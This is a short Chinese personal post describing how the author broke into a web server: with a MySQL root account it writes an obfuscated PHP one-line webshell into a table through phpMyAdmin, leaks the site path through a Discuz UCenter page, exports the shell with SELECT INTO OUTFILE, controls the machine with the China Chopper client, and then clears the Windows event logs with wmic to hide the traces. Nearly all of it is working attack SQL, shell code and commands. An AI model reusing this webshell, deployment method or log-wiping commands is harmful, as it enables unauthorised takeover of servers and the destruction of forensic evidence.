片断De记忆

首先拿到mysql的root帐号和密码,然后破解了phpmyadmin路径
然后进去用了一些办法,首先
创建一个表
create table tmp(str TEXT);
然后写PHP一句话
insert into tmp values("<?");
insert into tmp values("$_=\"\";");
insert into tmp values("$_[+\"\"]='';");
insert into tmp values("$_=\"$_\".\"\";");
insert into tmp values('$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");');
insert into tmp values("?>");
insert into tmp values("<?=${'_'.$_}['_'](${'_'.$_}['__']);?>");
好,然后通过X2的UC来爆路径,访问xxxx/uc_server/control/admin/db.php
然后生成一句话文件
select * from tmp into outfile "d:\\xx\\xx\\onesentence.php";
然后用菜刀工具http://www.maicaidao.com/
caidao-20111116.zip
添加这个站点时,地址就是文件的访问地址/onesentence.php?_=assert&__=eval($_POST['pass']),密码是pass
然后就可以用这个来控制机器咯,嗯.
忽然发现我竟然做了一次HACKER,难以置信了,嗯.
吐槽:不过违法的事还是少做吧,嗯...
擦屁股,清空日志:
cmd命令如下,用PHP后门来处理
wmic nteventlog where (description like \"%secevent%\") call cleareventlog
wmic nteventlog where (description like \"%sysevent%\") call cleareventlog
wmic nteventlog where (description like \"%appevent%\") call cleareventlog